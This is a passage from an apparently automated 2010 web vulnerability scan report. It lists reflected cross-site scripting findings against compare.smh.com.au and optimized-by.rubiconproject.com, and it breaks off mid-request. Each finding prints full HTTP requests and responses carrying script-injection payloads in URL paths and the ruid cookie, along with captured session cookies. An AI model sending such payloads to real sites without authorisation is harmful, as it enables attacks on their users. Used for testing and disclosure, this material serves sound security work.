The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 381c4"><script>alert(1)</script>dd6c6e19b36 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /javascripts381c4"><script>alert(1)</script>dd6c6e19b36/fabtabulous.js HTTP/1.1
Host: compare.smh.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=1.1290467888.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_nr=1290467844652; s_sq=%5B%5BB%5D%5D; __utma=1.407473643.1290467888.1290467888.1290467888.1; __utmc=1; _Mozo_session_id=2409697fd00bbe0551b244f62a12edb7; __utmb=1.2.10.1290467888;

Response

HTTP/1.1 302 Found
Date: Tue, 23 Nov 2010 00:03:44 GMT
Server: Apache/2.2.3 (CentOS) DAV/2 SVN/1.5.5 Phusion_Passenger/2.2.15 PHP/5.1.6
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.15
X-Runtime: 0.01459
Cache-Control: no-cache
Set-Cookie: _Mozo_session_id=2409697fd00bbe0551b244f62a12edb7; path=/
Location: http://www.smh.com.au/javascripts381c4"><script>alert(1)</script>dd6c6e19b36/fabtabulous.js
Content-Length: 157
Status: 302 Found
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<html><body>You are being <a href="http://www.smh.com.au/javascripts381c4"><script>alert(1)</script>dd6c6e19b36/fabtabulous.js">redirected</a>.</body></html>

2.117. http://compare.smh.com.au/javascripts/fabtabulous.js [REST URL parameter 2] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://compare.smh.com.au
Path:	/javascripts/fabtabulous.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bf1bb"><script>alert(1)</script>f1995ab054 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /javascripts/fabtabulous.jsbf1bb"><script>alert(1)</script>f1995ab054 HTTP/1.1
Host: compare.smh.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=1.1290467888.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_nr=1290467844652; s_sq=%5B%5BB%5D%5D; __utma=1.407473643.1290467888.1290467888.1290467888.1; __utmc=1; _Mozo_session_id=2409697fd00bbe0551b244f62a12edb7; __utmb=1.2.10.1290467888;

Response

HTTP/1.1 302 Found
Date: Tue, 23 Nov 2010 00:03:48 GMT
Server: Apache/2.2.3 (CentOS) DAV/2 SVN/1.5.5 Phusion_Passenger/2.2.15 PHP/5.1.6
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.15
X-Runtime: 0.02035
Cache-Control: no-cache
Set-Cookie: _Mozo_session_id=2409697fd00bbe0551b244f62a12edb7; path=/
Location: http://www.smh.com.au/javascripts/fabtabulous.jsbf1bb"><script>alert(1)</script>f1995ab054
Content-Length: 156
Status: 302 Found
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<html><body>You are being <a href="http://www.smh.com.au/javascripts/fabtabulous.jsbf1bb"><script>alert(1)</script>f1995ab054">redirected</a>.</body></html>

2.118. http://compare.smh.com.au/javascripts/modernizr-1.1.min.js [REST URL parameter 1] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://compare.smh.com.au
Path:	/javascripts/modernizr-1.1.min.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 44967"><script>alert(1)</script>776643f45cf was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /javascripts44967"><script>alert(1)</script>776643f45cf/modernizr-1.1.min.js HTTP/1.1
Host: compare.smh.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=1.1290467888.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_nr=1290467844652; s_sq=%5B%5BB%5D%5D; __utma=1.407473643.1290467888.1290467888.1290467888.1; __utmc=1; _Mozo_session_id=2409697fd00bbe0551b244f62a12edb7; __utmb=1.2.10.1290467888;

Response

HTTP/1.1 302 Found
Date: Tue, 23 Nov 2010 00:03:40 GMT
Server: Apache/2.2.3 (CentOS) DAV/2 SVN/1.5.5 Phusion_Passenger/2.2.15 PHP/5.1.6
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.15
X-Runtime: 0.01289
Cache-Control: no-cache
Set-Cookie: _Mozo_session_id=2409697fd00bbe0551b244f62a12edb7; path=/
Location: http://www.smh.com.au/javascripts44967"><script>alert(1)</script>776643f45cf/modernizr-1.1.min.js
Content-Length: 163
Status: 302 Found
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<html><body>You are being <a href="http://www.smh.com.au/javascripts44967"><script>alert(1)</script>776643f45cf/modernizr-1.1.min.js">redirected</a>.</body></html>

2.119. http://compare.smh.com.au/javascripts/modernizr-1.1.min.js [REST URL parameter 2] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://compare.smh.com.au
Path:	/javascripts/modernizr-1.1.min.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3b260"><script>alert(1)</script>8decc43993e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /javascripts/modernizr-1.1.min.js3b260"><script>alert(1)</script>8decc43993e HTTP/1.1
Host: compare.smh.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=1.1290467888.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_nr=1290467844652; s_sq=%5B%5BB%5D%5D; __utma=1.407473643.1290467888.1290467888.1290467888.1; __utmc=1; _Mozo_session_id=2409697fd00bbe0551b244f62a12edb7; __utmb=1.2.10.1290467888;

Response

HTTP/1.1 302 Found
Date: Tue, 23 Nov 2010 00:03:44 GMT
Server: Apache/2.2.3 (CentOS) DAV/2 SVN/1.5.5 Phusion_Passenger/2.2.15 PHP/5.1.6
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.15
X-Runtime: 0.01345
Cache-Control: no-cache
Set-Cookie: _Mozo_session_id=2409697fd00bbe0551b244f62a12edb7; path=/
Location: http://www.smh.com.au/javascripts/modernizr-1.1.min.js3b260"><script>alert(1)</script>8decc43993e
Content-Length: 163
Status: 302 Found
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<html><body>You are being <a href="http://www.smh.com.au/javascripts/modernizr-1.1.min.js3b260"><script>alert(1)</script>8decc43993e">redirected</a>.</body></html>

2.120. http://compare.smh.com.au/stylesheets/radius.css [REST URL parameter 1] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://compare.smh.com.au
Path:	/stylesheets/radius.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 40f84"><script>alert(1)</script>92d8614238 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /stylesheets40f84"><script>alert(1)</script>92d8614238/radius.css HTTP/1.1
Host: compare.smh.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=1.1290467888.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_nr=1290467844652; s_sq=%5B%5BB%5D%5D; __utma=1.407473643.1290467888.1290467888.1290467888.1; __utmc=1; _Mozo_session_id=2409697fd00bbe0551b244f62a12edb7; __utmb=1.2.10.1290467888;

Response

HTTP/1.1 302 Found
Date: Tue, 23 Nov 2010 00:03:44 GMT
Server: Apache/2.2.3 (CentOS) DAV/2 SVN/1.5.5 Phusion_Passenger/2.2.15 PHP/5.1.6
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.15
X-Runtime: 0.01340
Cache-Control: no-cache
Set-Cookie: _Mozo_session_id=2409697fd00bbe0551b244f62a12edb7; path=/
Location: http://www.smh.com.au/stylesheets40f84"><script>alert(1)</script>92d8614238/radius.css
Content-Length: 152
Status: 302 Found
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<html><body>You are being <a href="http://www.smh.com.au/stylesheets40f84"><script>alert(1)</script>92d8614238/radius.css">redirected</a>.</body></html>

2.121. http://compare.smh.com.au/stylesheets/radius.css [REST URL parameter 2] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://compare.smh.com.au
Path:	/stylesheets/radius.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5ed51"><script>alert(1)</script>0aab2f982d1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /stylesheets/radius.css5ed51"><script>alert(1)</script>0aab2f982d1 HTTP/1.1
Host: compare.smh.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=1.1290467888.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_nr=1290467844652; s_sq=%5B%5BB%5D%5D; __utma=1.407473643.1290467888.1290467888.1290467888.1; __utmc=1; _Mozo_session_id=2409697fd00bbe0551b244f62a12edb7; __utmb=1.2.10.1290467888;

Response

HTTP/1.1 302 Found
Date: Tue, 23 Nov 2010 00:03:48 GMT
Server: Apache/2.2.3 (CentOS) DAV/2 SVN/1.5.5 Phusion_Passenger/2.2.15 PHP/5.1.6
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.15
X-Runtime: 0.01419
Cache-Control: no-cache
Set-Cookie: _Mozo_session_id=2409697fd00bbe0551b244f62a12edb7; path=/
Location: http://www.smh.com.au/stylesheets/radius.css5ed51"><script>alert(1)</script>0aab2f982d1
Content-Length: 153
Status: 302 Found
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<html><body>You are being <a href="http://www.smh.com.au/stylesheets/radius.css5ed51"><script>alert(1)</script>0aab2f982d1">redirected</a>.</body></html>

2.122. http://optimized-by.rubiconproject.com/a/7725/12338/21770-15.js [ruid cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://optimized-by.rubiconproject.com
Path:	/a/7725/12338/21770-15.js

Issue detail

The value of the ruid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e81c3"-alert(1)-"46752330b64 was submitted in the ruid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /a/7725/12338/21770-15.js HTTP/1.1
Host: optimized-by.rubiconproject.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: put_1902=hr0kpYfmJaKf6nWigrprodDvJKGf7nKnhuzEaLTg; rdk9=0; put_1185=7574652266400145248; csi9=3182598.js^1^1290469839^1290469839; rdk15=0; rpb=5576%3D1%264210%3D1%263632%3D1%265421%3D1%264212%3D1%264894%3D1%264970%3D1%264940%3D1%265872%3D1%265884%3D1%264214%3D1%264554%3D1%264222%3D1%265671%3D1%264939%3D1%264705%3D1%262372%3D1%262206%3D1%262113%3D1%262112%3D1%263577%3D1%262765%3D1%262374%3D1; rdk=7856/12590; put_1523=585809c5-28c5-4848-a99c-7f4f9237f077; csi15=3152311.js^1^1290469846^1290469846&3153724.js^1^1290469831^1290469831&3151467.js^1^1290469819^1290469819&3161223.js^1^1290469817^1290469817&3151650.js^1^1290469748^1290469748&3165015.js^1^1290469014^1290469014&3141222.js^2^1290398961^1290399011&3174355.js^1^1290398957^1290398957; put_2081=CG-00000000329343779; rsid=EsaHQCD9pIJSVePhfwYEzrVgfqmY0U14pvzAE0m27GJPANHRUnKUEM1gN6NR349f2rdGzx5zznTOcowuGOs2UZAHpcBvGHLZUZj+18GyLPZWNJJs7VW/GiUFnXQJ; put_1994=cdes03xfgoce; csi30=3178537.js^1^1290467968^1290467968&3173645.js^1^1290467838^1290467838&3177238.js^1^1290467837^1290467837&3176931.js^1^1290467822^1290467822&3177960.js^1^1290467807^1290467807&3173350.js^1^1290467806^1290467806&3175689.js^1^1290467749^1290467749&3173073.js^1^1290467747^1290467747&3182535.js^1^1290467742^1290467742&3173803.js^1^1290467740^1290467740; csi18=3165136.js^1^1290348146^1290348146&3153767.js^5^1290328815^1290335680&3149616.js^1^1290329176^1290329176&3149615.js^1^1290328453^1290328453&3149590.js^1^1290327188^1290327188&3177477.js^2^1290324300^1290324480&3170027.js^6^1290322854^1290323938&3149602.js^3^1290322132^1290322676&3149572.js^4^1290319540^1290321951&3171141.js^5^1290319432^1290321770; put_1430=a543a58e-2baf-45f7-a1bb-0a2ba6c33b25; au=GG8K86FH-LAEM-10.244.194.4; put_1197=3200630513076977442; khaos=GGTZ6NWQ-D-2XOG; ruid=e81c3"-alert(1)-"46752330b64; csi2=3151648.js^1^1290470170^1290470170&3179880.js^1^1290469857^1290469857&3152310.js^1^1290469855^1290469855&3153722.js^1^1290469840^1290469840&3165013.js^2^1290469022^1290469214&3151249.js^1^1290469023^1290469023; put_1986=618312354976649179; put_1512=4cceb5c0-b82c-f0da-bbe7-e70ef7046a71; put_2054=af53dcd2-03db-4f4f-9fcc-47ea5739fe42; rdk2=0; rdk1=0; cd=false;

Response

HTTP/1.1 200 OK
Date: Mon, 22 Nov 2010 23:59:46 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=7725/12338; expires=Tue, 23-Nov-2010 00:59:46 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk15=0; expires=Tue, 23-Nov-2010 00:59:46 GMT; max-age=10; path=/; domain=.rubiconproject.com
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
_eep-Alive: timeout=5, max=7
_onnection: Keep-Alive
Content-Type: application/x-javascript
Connection: close
Content-Length: 2677

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3168958"
...[SNIP]...
<img src=\"http://trgca.opt.fimserve.com/fp.gif?pixelid=287-036699&diresu=e81c3"-alert(1)-"46752330b64\" width=\"1\" height=\"1\" />
...[SNIP]...

2.123. http://optimized-by.rubiconproject.com/a/7725/12338/21770-2.js [ruid cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://optimized-by.rubiconproject.com
Path:	/a/7725/12338/21770-2.js

Issue detail

The value of the ruid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c09b8"-alert(1)-"9ad87b9b27b was submitted in the ruid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /a/7725/12338/21770-2.js HTTP/1.1
Host: optimized-by.rubiconproject.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: put_1902=hr0kpYfmJaKf6nWigrprodDvJKGf7nKnhuzEaLTg; rdk9=0; put_1185=7574652266400145248; csi9=3182598.js^1^1290469839^1290469839; rdk15=0; rpb=5576%3D1%264210%3D1%263632%3D1%265421%3D1%264212%3D1%264894%3D1%264970%3D1%264940%3D1%265872%3D1%265884%3D1%264214%3D1%264554%3D1%264222%3D1%265671%3D1%264939%3D1%264705%3D1%262372%3D1%262206%3D1%262113%3D1%262112%3D1%263577%3D1%262765%3D1%262374%3D1; rdk=7856/12590; put_1523=585809c5-28c5-4848-a99c-7f4f9237f077; csi15=3152311.js^1^1290469846^1290469846&3153724.js^1^1290469831^1290469831&3151467.js^1^1290469819^1290469819&3161223.js^1^1290469817^1290469817&3151650.js^1^1290469748^1290469748&3165015.js^1^1290469014^1290469014&3141222.js^2^1290398961^1290399011&3174355.js^1^1290398957^1290398957; put_2081=CG-00000000329343779; rsid=EsaHQCD9pIJSVePhfwYEzrVgfqmY0U14pvzAE0m27GJPANHRUnKUEM1gN6NR349f2rdGzx5zznTOcowuGOs2UZAHpcBvGHLZUZj+18GyLPZWNJJs7VW/GiUFnXQJ; put_1994=cdes03xfgoce; csi30=3178537.js^1^1290467968^1290467968&3173645.js^1^1290467838^1290467838&3177238.js^1^1290467837^1290467837&3176931.js^1^1290467822^1290467822&3177960.js^1^1290467807^1290467807&3173350.js^1^1290467806^1290467806&3175689.js^1^1290467749^1290467749&3173073.js^1^1290467747^1290467747&3182535.js^1^1290467742^1290467742&3173803.js^1^1290467740^1290467740; csi18=3165136.js^1^1290348146^1290348146&3153767.js^5^1290328815^1290335680&3149616.js^1^1290329176^1290329176&3149615.js^1^1290328453^1290328453&3149590.js^1^1290327188^1290327188&3177477.js^2^1290324300^1290324480&3170027.js^6^1290322854^1290323938&3149602.js^3^1290322132^1290322676&3149572.js^4^1290319540^1290321951&3171141.js^5^1290319432^1290321770; put_1430=a543a58e-2baf-45f7-a1bb-0a2ba6c33b25; au=GG8K86FH-LAEM-10.244.194.4; put_1197=3200630513076977442; khaos=GGTZ6NWQ-D-2XOG; ruid=c09b8"-alert(1)-"9ad87b9b27b; csi2=3151648.js^1^1290470170^1290470170&3179880.js^1^1290469857^1290469857&3152310.js^1^1290469855^1290469855&3153722.js^1^1290469840^1290469840&3165013.js^2^1290469022^1290469214&3151249.js^1^1290469023^1290469023; put_1986=618312354976649179; put_1512=4cceb5c0-b82c-f0da-bbe7-e70ef7046a71; put_2054=af53dcd2-03db-4f4f-9fcc-47ea5739fe42; rdk2=0; rdk1=0; cd=false;

Response

HTTP/1.1 200 OK
Date: Mon, 22 Nov 2010 23:59:20 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=7725/12338; expires=Tue, 23-Nov-2010 00:59:20 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk2=0; expires=Tue, 23-Nov-2010 00:59:20 GMT; max-age=10; path=/; domain=.rubiconproject.com
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
_eep-Alive: timeout=5, max=3
_onnection: Keep-Alive
Content-Type: application/x-javascript
Connection: close
Content-Length: 2677

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3168960"
...[SNIP]...
<img src=\"http://trgca.opt.fimserve.com/fp.gif?pixelid=287-036699&diresu=c09b8"-alert(1)-"9ad87b9b27b\" width=\"1\" height=\"1\" />
...[SNIP]...

2.124. http://optimized-by.rubiconproject.com/a/7725/12338/22678-15.js [ruid cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://optimized-by.rubiconproject.com
Path:	/a/7725/12338/22678-15.js

Issue detail

The value of the ruid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e3133"-alert(1)-"d0c5b6d297 was submitted in the ruid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /a/7725/12338/22678-15.js HTTP/1.1
Host: optimized-by.rubiconproject.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: put_1902=hr0kpYfmJaKf6nWigrprodDvJKGf7nKnhuzEaLTg; rdk9=0; put_1185=7574652266400145248; csi9=3182598.js^1^1290469839^1290469839; rdk15=0; rpb=5576%3D1%264210%3D1%263632%3D1%265421%3D1%264212%3D1%264894%3D1%264970%3D1%264940%3D1%265872%3D1%265884%3D1%264214%3D1%264554%3D1%264222%3D1%265671%3D1%264939%3D1%264705%3D1%262372%3D1%262206%3D1%262113%3D1%262112%3D1%263577%3D1%262765%3D1%262374%3D1; rdk=7856/12590; put_1523=585809c5-28c5-4848-a99c-7f4f9237f077; csi15=3152311.js^1^1290469846^1290469846&3153724.js^1^1290469831^1290469831&3151467.js^1^1290469819^1290469819&3161223.js^1^1290469817^1290469817&3151650.js^1^1290469748^1290469748&3165015.js^1^1290469014^1290469014&3141222.js^2^1290398961^1290399011&3174355.js^1^1290398957^1290398957; put_2081=CG-00000000329343779; rsid=EsaHQCD9pIJSVePhfwYEzrVgfqmY0U14pvzAE0m27GJPANHRUnKUEM1gN6NR349f2rdGzx5zznTOcowuGOs2UZAHpcBvGHLZUZj+18GyLPZWNJJs7VW/GiUFnXQJ; put_1994=cdes03xfgoce; csi30=3178537.js^1^1290467968^1290467968&3173645.js^1^1290467838^1290467838&3177238.js^1^1290467837^1290467837&3176931.js^1^1290467822^1290467822&3177960.js^1^1290467807^1290467807&3173350.js^1^1290467806^1290467806&3175689.js^1^1290467749^1290467749&3173073.js^1^1290467747^1290467747&3182535.js^1^1290467742^1290467742&3173803.js^1^1290467740^1290467740; csi18=3165136.js^1^1290348146^1290348146&3153767.js^5^1290328815^1290335680&3149616.js^1^1290329176^1290329176&3149615.js^1^1290328453^1290328453&3149590.js^1^1290327188^1290327188&3177477.js^2^1290324300^1290324480&3170027.js^6^1290322854^1290323938&3149602.js^3^1290322132^1290322676&3149572.js^4^1290319540^1290321951&3171141.js^5^1290319432^1290321770; put_1430=a543a58e-2baf-45f7-a1bb-0a2ba6c33b25; au=GG8K86FH-LAEM-10.244.194.4; put_1197=3200630513076977442; khaos=GGTZ6NWQ-D-2XOG; ruid=e3133"-alert(1)-"d0c5b6d297; csi2=3151648.js^1^1290470170^1290470170&3179880.js^1^1290469857^1290469857&3152310.js^1^1290469855^1290469855&3153722.js^1^1290469840^1290469840&3165013.js^2^1290469022^1290469214&3151249.js^1^1290469023^1290469023; put_1986=618312354976649179; put_1512=4cceb5c0-b82c-f0da-bbe7-e70ef7046a71; put_2054=af53dcd2-03db-4f4f-9fcc-47ea5739fe42; rdk2=0; rdk1=0; cd=false;

Response

HTTP/1.1 200 OK
Date: Mon, 22 Nov 2010 23:59:23 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=7725/12338; expires=Tue, 23-Nov-2010 00:59:23 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk15=0; expires=Tue, 23-Nov-2010 00:59:23 GMT; max-age=10; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi15=3152311.js^2^1290469846^1290470363&3153724.js^1^1290469831^1290469831&3151467.js^1^1290469819^1290469819&3161223.js^1^1290469817^1290469817&3151650.js^1^1290469748^1290469748&3165015.js^1^1290469014^1290469014&3141222.js^2^1290398961^1290399011&3174355.js^1^1290398957^1290398957; expires=Mon, 29-Nov-2010 23:59:23 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
_eep-Alive: timeout=5, max=7
_onnection: Keep-Alive
Content-Type: application/x-javascript
Connection: close
Content-Length: 2568

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3152311"
...[SNIP]...
<img src=\"http://trgca.opt.fimserve.com/fp.gif?pixelid=287-036699&diresu=e3133"-alert(1)-"d0c5b6d297\" width=\"1\" height=\"1\" />
...[SNIP]...

2.125. http://optimized-by.rubiconproject.com/a/7725/12338/22678-2.js [ruid cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://optimized-by.rubiconproject.com
Path:	/a/7725/12338/22678-2.js

Issue detail

The value of the ruid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b4b59"-alert(1)-"6d782b159b3 was submitted in the ruid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /a/7725/12338/22678-2.js HTTP/1.1
Host: optimized-by.rubiconproject.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: put_1902=hr0kpYfmJaKf6nWigrprodDvJKGf7nKnhuzEaLTg; rdk9=0; put_1185=7574652266400145248; csi9=3182598.js^1^1290469839^1290469839; rdk15=0; rpb=5576%3D1%264210%3D1%263632%3D1%265421%3D1%264212%3D1%264894%3D1%264970%3D1%264940%3D1%265872%3D1%265884%3D1%264214%3D1%264554%3D1%264222%3D1%265671%3D1%264939%3D1%264705%3D1%262372%3D1%262206%3D1%262113%3D1%262112%3D1%263577%3D1%262765%3D1%262374%3D1; rdk=7856/12590; put_1523=585809c5-28c5-4848-a99c-7f4f9237f077; csi15=3152311.js^1^1290469846^1290469846&3153724.js^1^1290469831^1290469831&3151467.js^1^1290469819^1290469819&3161223.js^1^1290469817^1290469817&3151650.js^1^1290469748^1290469748&3165015.js^1^1290469014^1290469014&3141222.js^2^1290398961^1290399011&3174355.js^1^1290398957^1290398957; put_2081=CG-00000000329343779; rsid=EsaHQCD9pIJSVePhfwYEzrVgfqmY0U14pvzAE0m27GJPANHRUnKUEM1gN6NR349f2rdGzx5zznTOcowuGOs2UZAHpcBvGHLZUZj+18GyLPZWNJJs7VW/GiUFnXQJ; put_1994=cdes03xfgoce; csi30=3178537.js^1^1290467968^1290467968&3173645.js^1^1290467838^1290467838&3177238.js^1^1290467837^1290467837&3176931.js^1^1290467822^1290467822&3177960.js^1^1290467807^1290467807&3173350.js^1^1290467806^1290467806&3175689.js^1^1290467749^1290467749&3173073.js^1^1290467747^1290467747&3182535.js^1^1290467742^1290467742&3173803.js^1^1290467740^1290467740; csi18=3165136.js^1^1290348146^1290348146&3153767.js^5^1290328815^1290335680&3149616.js^1^1290329176^1290329176&3149615.js^1^1290328453^1290328453&3149590.js^1^1290327188^1290327188&3177477.js^2^1290324300^1290324480&3170027.js^6^1290322854^1290323938&3149602.js^3^1290322132^1290322676&3149572.js^4^1290319540^1290321951&3171141.js^5^1290319432^1290321770; put_1430=a543a58e-2baf-45f7-a1bb-0a2ba6c33b25; au=GG8K86FH-LAEM-10.244.194.4; put_1197=3200630513076977442; khaos=GGTZ6NWQ-D-2XOG; ruid=b4b59"-alert(1)-"6d782b159b3; 